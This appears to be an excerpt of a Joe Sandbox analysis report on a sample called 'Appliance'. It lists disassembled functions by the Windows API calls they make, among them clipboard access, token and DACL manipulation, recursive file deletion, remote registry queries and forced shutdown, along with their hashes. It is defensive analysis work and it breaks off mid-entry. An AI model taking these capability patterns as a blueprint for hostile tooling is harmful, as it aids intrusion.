Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8bf4d0313fc22b82224d4655b9404505ed273333cf454541aef180e17fbfe675
Instruction ID: 6119f816eaf92ba74afab9f85105adc45b8e5752f573bf2442e68e0a05ee6752
Opcode Fuzzy Hash: 8bf4d0313fc22b82224d4655b9404505ed273333cf454541aef180e17fbfe675
Instruction Fuzzy Hash: 47B092A800462009AD280A386A0A999330079423AABDC3FC0E479A52F1D339884FA955

Function 00E3664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00E2DC54: FindFirstFileW.KERNEL32(?,?), ref: 00E2DCCB
Part of subcall function 00E2DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00E2DD1B
Part of subcall function 00E2DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E2DD2C
Part of subcall function 00E2DC54: FindClose.KERNEL32(00000000), ref: 00E2DD43

GetLastError.KERNEL32 ref: 00E3666E

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 6a14feecfb430cc16bbbf9ee5f3c302938ea6b1b527666577905399f1ec09fab
Instruction ID: 048810e6c7fd2f80ed72113b6986c812d8c0d16107629c37d07c06f761d606db
Opcode Fuzzy Hash: 6a14feecfb430cc16bbbf9ee5f3c302938ea6b1b527666577905399f1ec09fab
Instruction Fuzzy Hash: 78F058362042109FCB14AF59D845F6ABBE9EF88760F048449F949AB352CB70BC01CBA1

Non-executed Functions

Function 00E21B4D Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00E22010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E2205A
Part of subcall function 00E22010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E22087
Part of subcall function 00E22010: GetLastError.KERNEL32 ref: 00E22097

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00E21BD2
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00E21BF4
CloseHandle.KERNEL32(?), ref: 00E21C05
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E21C1D
GetProcessWindowStation.USER32 ref: 00E21C36
SetProcessWindowStation.USER32(00000000), ref: 00E21C40
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E21C5C

Part of subcall function 00E21A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E21B48), ref: 00E21A20
Part of subcall function 00E21A0B: CloseHandle.KERNEL32(?,?,00E21B48), ref: 00E21A35

Strings

default, xrefs: 00E21C57
winsta0, xrefs: 00E21C18
, xrefs: 00E21BA6
j, xrefs: 00E21CDE

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$j
API String ID: 22674027-2615587742
Opcode ID: 855147ae0c91296276f156e65d2d118550a88d2b662bd498d7debbe90b9d1d0e
Instruction ID: 2c16eeab61aa58d504dc21eefd3dc7453a7a372e7e826af8d6823b18dbdc7efa
Opcode Fuzzy Hash: 855147ae0c91296276f156e65d2d118550a88d2b662bd498d7debbe90b9d1d0e
Instruction Fuzzy Hash: FC817771900318AFDF259FA1EC49FEE7BB8EF08306F1454A9F914B61A0D7718A49CB60

Function 00E214AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E21A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E21A60
Part of subcall function 00E21A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A6C
Part of subcall function 00E21A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A7B
Part of subcall function 00E21A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A82
Part of subcall function 00E21A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E21A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E21518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E2154C
GetLengthSid.ADVAPI32(?), ref: 00E21563
GetAce.ADVAPI32(?,00000000,?), ref: 00E2159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E215B9
GetLengthSid.ADVAPI32(?), ref: 00E215D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E215D8
HeapAlloc.KERNEL32(00000000), ref: 00E215DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E21600
CopySid.ADVAPI32(00000000), ref: 00E21607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E21636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E21658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E2166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E21691
HeapFree.KERNEL32(00000000), ref: 00E21698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E216A1
HeapFree.KERNEL32(00000000), ref: 00E216A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E216B1
HeapFree.KERNEL32(00000000), ref: 00E216B8
GetProcessHeap.KERNEL32(00000000,?), ref: 00E216C4
HeapFree.KERNEL32(00000000), ref: 00E216CB

Part of subcall function 00E21ADF: GetProcessHeap.KERNEL32(00000008,00E214FD,?,00000000,?,00E214FD,?), ref: 00E21AED
Part of subcall function 00E21ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E214FD,?), ref: 00E21AF4
Part of subcall function 00E21ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E214FD,?), ref: 00E21B03

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 15532dad74815cf8e5f5276001b0973330f4385b8ac7a6c0a2f18a78ebe3cf9d
Instruction ID: 9372bdb412b4f30cc913e953f0a81a46f244401394bc63f2c2a81de93d0857d7
Opcode Fuzzy Hash: 15532dad74815cf8e5f5276001b0973330f4385b8ac7a6c0a2f18a78ebe3cf9d
Instruction Fuzzy Hash: 80717AB2900219AFDF20DFA5EC48FAEBBB9FF14315F084595E915F6190D7319A09CBA0

Function 00E3F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00E5DCD0), ref: 00E3F586
IsClipboardFormatAvailable.USER32(0000000D), ref: 00E3F594
GetClipboardData.USER32(0000000D), ref: 00E3F5A0
CloseClipboard.USER32 ref: 00E3F5AC
GlobalLock.KERNEL32(00000000), ref: 00E3F5E4
CloseClipboard.USER32 ref: 00E3F5EE
GlobalUnlock.KERNEL32(00000000), ref: 00E3F619
IsClipboardFormatAvailable.USER32(00000001), ref: 00E3F626
GetClipboardData.USER32(00000001), ref: 00E3F62E
GlobalLock.KERNEL32(00000000), ref: 00E3F63F
GlobalUnlock.KERNEL32(00000000), ref: 00E3F67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 00E3F695
GetClipboardData.USER32(0000000F), ref: 00E3F6A1
GlobalLock.KERNEL32(00000000), ref: 00E3F6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00E3F6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E3F6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E3F72F
GlobalUnlock.KERNEL32(00000000), ref: 00E3F750
CountClipboardFormats.USER32 ref: 00E3F771
CloseClipboard.USER32 ref: 00E3F7B6

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: d3e9fd1c91788827171844b49c52ab76c2e05032cc6592993f181699ca4d5fe5
Instruction ID: aaa88d6583e72fdb96c22ec39e8ad9d6782ae52655964c10db4d112150de2262
Opcode Fuzzy Hash: d3e9fd1c91788827171844b49c52ab76c2e05032cc6592993f181699ca4d5fe5
Instruction Fuzzy Hash: 8F61C235504302AFD314EF20DC89F6A7BA4EF84709F04486DF446A72A2DB71DD4ACB62

Function 00E373D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00E37403
FindClose.KERNEL32(00000000), ref: 00E37457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E37493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E374BA

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

FileTimeToSystemTime.KERNEL32(?,?), ref: 00E374F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00E37524

Strings

%4d%02d%02d%02d%02d%02d%03d, xrefs: 00E37577
%4d%02d%02d%02d%02d%02d, xrefs: 00E375AF
%4d, xrefs: 00E375F6
%03d, xrefs: 00E377E7
%02d, xrefs: 00E37645, 00E3764F, 00E3769F, 00E376EF, 00E3773F, 00E3778F

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: e7e3b90f4b576652e99c73446cf57bcbfc7b5758daf148c0fa0feae040a4ac0b
Instruction ID: 511f81341e08b559f37e4de16bb24ad8374fbad21a9c7bfe1c6c01983bc18923
Opcode Fuzzy Hash: e7e3b90f4b576652e99c73446cf57bcbfc7b5758daf148c0fa0feae040a4ac0b
Instruction Fuzzy Hash: 3FD151B2508345AEC314EB65C845EABB7ECEF88704F44091EF589D7252EB74DA44CB72

Function 00E3A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E3A0A8
GetFileAttributesW.KERNEL32(?), ref: 00E3A0E6
SetFileAttributesW.KERNEL32(?,?), ref: 00E3A100
FindNextFileW.KERNEL32(00000000,?), ref: 00E3A118
FindClose.KERNEL32(00000000), ref: 00E3A123
FindFirstFileW.KERNEL32(*.*,?), ref: 00E3A13F
SetCurrentDirectoryW.KERNEL32(?), ref: 00E3A18F
SetCurrentDirectoryW.KERNEL32(00E87B94), ref: 00E3A1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E3A1B7
FindClose.KERNEL32(00000000), ref: 00E3A1C4
FindClose.KERNEL32(00000000), ref: 00E3A1D4

Strings

*.*, xrefs: 00E3A13A

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 475247b9ce7e028fb258114d636dd70e3fb131f84094a1d1fadbc746680f50b0
Instruction ID: 5a7dcdcae0c572e7c2b992438af839555b2794141617fc4d036a3bd7595aac13
Opcode Fuzzy Hash: 475247b9ce7e028fb258114d636dd70e3fb131f84094a1d1fadbc746680f50b0
Instruction Fuzzy Hash: E531027160531D6FDB24AFA1DC4DADE7BAD9F04365F141461E844F20A0EB70DE84CB21

Function 00E34763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E34785
_wcslen.LIBCMT ref: 00E347B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 00E347E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E34803
RemoveDirectoryW.KERNEL32(?), ref: 00E34813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E3489A
CloseHandle.KERNEL32(00000000), ref: 00E348A5
CloseHandle.KERNEL32(00000000), ref: 00E348B0

Strings

\??\%s, xrefs: 00E347A0
:, xrefs: 00E347C7
\, xrefs: 00E347BC

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 515db80a31d363301098438623680bd8f1325a084cb6b5e785840a1847e63ce3
Instruction ID: 30cd1149b8f167e3976798308dd601c437df6a6a0b8fdcd8179fa4cddaaa4414
Opcode Fuzzy Hash: 515db80a31d363301098438623680bd8f1325a084cb6b5e785840a1847e63ce3
Instruction Fuzzy Hash: 4C31A1B5504249ABDB219BA1DC49FEB37BCEF89705F1045B6F509E60A0E7709684CB24

Function 00E3A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E3A203
FindNextFileW.KERNEL32(00000000,?), ref: 00E3A25E
FindClose.KERNEL32(00000000), ref: 00E3A269
FindFirstFileW.KERNEL32(*.*,?), ref: 00E3A285
SetCurrentDirectoryW.KERNEL32(?), ref: 00E3A2D5
SetCurrentDirectoryW.KERNEL32(00E87B94), ref: 00E3A2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E3A2FD
FindClose.KERNEL32(00000000), ref: 00E3A30A
FindClose.KERNEL32(00000000), ref: 00E3A31A

Part of subcall function 00E2E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E2E3B4

Strings

*.*, xrefs: 00E3A280

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: f3ea2b874759a571a9e3fab378eada6b8e9b68d0df99aeff6df0434317d57578
Instruction ID: bb18ac5b0ffd884ae6331ba009c370807948d77165b6427244200d5712f23fd1
Opcode Fuzzy Hash: f3ea2b874759a571a9e3fab378eada6b8e9b68d0df99aeff6df0434317d57578
Instruction Fuzzy Hash: B531F2315047196ECB24BFA5EC0DADE7BAD9F45328F1815A1E854B20A0EB35DEC9CA21

Function 00E4C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E4D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E4C10E,?,?), ref: 00E4D415
Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D451
Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D4C8
Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E4C99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00E4CA09
RegCloseKey.ADVAPI32(00000000), ref: 00E4CA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E4CA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E4CB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00E4CBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00E4CC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00E4CC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00E4CD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E4CDE2
RegCloseKey.ADVAPI32(00000000), ref: 00E4CDEF

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: cd94b07955e71f23cd36b9eccf3bc4d3b5cc91c9c1ac37022e171cfee28127dc
Instruction ID: 1bb85527e121ad0753509878c75182892b73bb65cb855456502e1ff360817bbb
Opcode Fuzzy Hash: cd94b07955e71f23cd36b9eccf3bc4d3b5cc91c9c1ac37022e171cfee28127dc
Instruction Fuzzy Hash: 91026271605200AFC754DF24D895F2ABBE5EF88318F18849DF44ADB2A2DB31ED46CB61

Function 00E2D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DC55D1,?,?,00E04B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DC5871

Part of subcall function 00E2EAB0: GetFileAttributesW.KERNEL32(?,00E2D840), ref: 00E2EAB1

FindFirstFileW.KERNEL32(?,?), ref: 00E2D9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00E2DA88
MoveFileW.KERNEL32(?,?), ref: 00E2DA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 00E2DAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E2DAE2

Part of subcall function 00E2DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00E2DAC7,?,?), ref: 00E2DB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 00E2DAFE
FindClose.KERNEL32(00000000), ref: 00E2DB0F

Strings

\*.*, xrefs: 00E2D978, 00E2D981, 00E2D996

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 34a2e1497defb9797f056dac22d8b95d71a6176134b0b20dcf1ace41be1edd73
Instruction ID: 138e4536da13a8cda8e8f710d70a44e04a1c8f294b2fc5ea05125b4bdd934e6e
Opcode Fuzzy Hash: 34a2e1497defb9797f056dac22d8b95d71a6176134b0b20dcf1ace41be1edd73
Instruction Fuzzy Hash: 5761487180911AAECF05EBA0ED52EEDB7B5AF14305F2041A9E50277191DB71AF4ACB60

Function 00E3F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00E3F7EE
EmptyClipboard.USER32 ref: 00E3F7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 00E3F809
CloseClipboard.USER32 ref: 00E3F900

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: a542012b09ffaa3370c6702a210fe5e937f0c663b502bc0ba1268f7d9aed0f6c
Instruction ID: ec7a6b9d2ea13bcc98f843a2fb09d67c5e83ec22835d8bb09481c3134c9cc43c
Opcode Fuzzy Hash: a542012b09ffaa3370c6702a210fe5e937f0c663b502bc0ba1268f7d9aed0f6c
Instruction Fuzzy Hash: A1419D34A04602AFD728DF16D88CF55BBE4EF44319F14C4A9E419AB662CB75EC46CBA0

Function 00E2F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00E22010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E2205A
Part of subcall function 00E22010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E22087
Part of subcall function 00E22010: GetLastError.KERNEL32 ref: 00E22097

ExitWindowsEx.USER32(?,00000000), ref: 00E2F249

Strings

, xrefs: 00E2F273
, xrefs: 00E2F237
@, xrefs: 00E2F23C
SeShutdownPrivilege, xrefs: 00E2F219

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: be44929650021050a317458614240889b3e2a66618e2e602048d9c90af32fa0d
Instruction ID: da83d0b723b7f3283dba9cbed53cdb30ef8244d2a82ef92ee81e48e6d9f16c0e
Opcode Fuzzy Hash: be44929650021050a317458614240889b3e2a66618e2e602048d9c90af32fa0d
Instruction Fuzzy Hash: 4F01A77B614234ABEB2862A87C85FBA727C9B05345F151931F902F21E1D5608D049160

Function 00DC22AD Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 00DC233E
GetSysColor.USER32(0000000F), ref: 00DC2421
SetBkColor.GDI32(?,00000000), ref: 00DC2434

Strings

